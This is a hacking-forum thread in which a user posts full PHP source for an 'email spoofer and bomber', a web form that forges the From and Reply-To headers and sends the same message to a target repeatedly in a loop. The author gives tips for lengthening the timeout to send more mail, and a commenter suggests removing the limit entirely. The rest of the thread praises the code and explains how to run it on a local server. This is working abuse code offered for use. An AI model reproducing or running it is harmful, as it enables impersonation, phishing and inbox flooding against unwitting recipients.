Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Email spoofer & bomber

0 0

I wrote an email spoofer and bomber. Here's the code :) For those that dont have an apache server, use it at my website: [removed due to newbie spam] Timeout is set to 240 seconds(4 minutes), that are about 40 emails, you can always set the timeout higher for more emails :) change it to 600 seconds for 10 minutsn etc…

Enjoy!!!

<?php //WRITTEN BY SUPERPIMP //[removed due to newbie spam] //timeout limit for script set_time_limit(240); //send mail function send_mail(){ echo "<font face='georgia' size='2'>\r\n";

$to=$_POST[&#39;to&#39;];
$from=$_POST[&#39;from&#39;];
$reply=$_POST[&#39;reply&#39;];
$headers=&quot;From: &quot;.$from.&quot;&#92;r&#92;nReply-To: &quot;.$reply;
$subject=$_POST[&#39;subject&#39;];
$message=$_POST[&#39;textarea&#39;];
$num=$_POST[&#39;num&#39;];
$counter=range(1,$num);

if(isset($to) && isset($from) && isset($message) && $num!=NULL){
    foreach($counter as $counter)
    {
        if (mail($to, $subject, $message, $headers)){
            echo &quot;&lt;title&gt;Mail sent!&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;&lt;p&gt;Mail n° &quot;.$counter.&quot; succesfully sent!&#92;r&#92;n&quot;;
        }
        else {
            echo &quot;&lt;title&gt;Mail not sent&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;Mail n° &quot;.$counter.&quot;couldn&#39;t be sent, please try again.&#92;r&#92;n&quot;;
        }
    }
}
elseif($num==NULL){
        if (@mail($to, $subject, $message, $headers)){
            echo &quot;&lt;title&gt;Mail sent!&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;&lt;p&gt;Mail succesfully sent!&#92;r&#92;n&quot;;
        }
        else {
            echo &quot;&lt;title&gt;Mail not sent&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;Mail couldn&#39;t be sent, please try again.&#92;r&#92;n&quot;;
        }
    }
else{
    echo &quot;Please fill in all necessary fields.&quot;;
}

} //display mail form function mail_form() { echo <<<DISPLAY_FORM <head> <title>Email Spoofer/Bomber</title> <font face='tahoma' size='3'> <u>Email Spoofer/Bomber</u> </head> <body> <p> <font face='tahoma' size='2'> <table><form action='index.php' method='post'> <tr><td>receiver:</td><td> <INPUT class='field' type='text' name='to' size='50'></td></tr> <tr><td>your email:</td><td> <INPUT class='field' type='text' name='from' size='50'></td></tr> <tr><td>reply email:</td><td> <INPUT class='field' type='text' name='reply' size='50'></td></tr> <tr><td>subject:</td><td> <INPUT class='field' type='text' name='subject' size='50'></td></tr> <tr><td>send email</td><td> <INPUT class='field' type='integer' name='num' size='10'> times</td></tr> <tr><td>text:</td><td><textarea name='textarea' cols='50' rows='10'>Type your message here.</textarea></td></tr> <input type="hidden" name="send" value="1"> <tr><td><INPUT class=button type=submit value='Send!' action='index.php'></form></td></tr></table> <tr><td><p>Warning: bombing an email takes a while, please be patient!</td></tr> <p> </p> <p> <i>Note: the website admin cannot be held responsible for possible abuse of this email script.</i> </body> </html> DISPLAY_FORM; }

$send=$_POST['send'];

//execute functions if(isset($send)){ send_mail(); } else{ mail_form(); } ?>

0 0

i&#39;m not sure but dosn&#39;t this belonge in the code bank? but its a great piece of code that must be said :D

0 1

nice work. you should submit it into the code bank.

0 0

I dont understand what it is supposed to do is it like a code for a webpage

0 1

superpimp wrote: Timeout is set to 240 seconds(4 minutes), that are about 40 emails, you can always set the timeout higher for more emails :) change it to 600 seconds for 10 minutsn etc…

or just set it to 0 so it doesnt have a time limit :)

0 0

Wow– this is niice. It's good to write small apps like this.. You should start writing MODs for phpbb or IPB.. or any program but.. good to start small.

0 0

thanks :) I thought I'd post it here because if I post it in the code bank no-one notices :P @hacking_noob: it's the source code of a php page, add it to somepage.php, if you have an apache server set up, you can run the script. Get one here: http://www.wampserver.com/ Place the file in the www dir (standard: c:\wamp\www\) and then go to your browser and type localhost/somepage.php and you can run it :D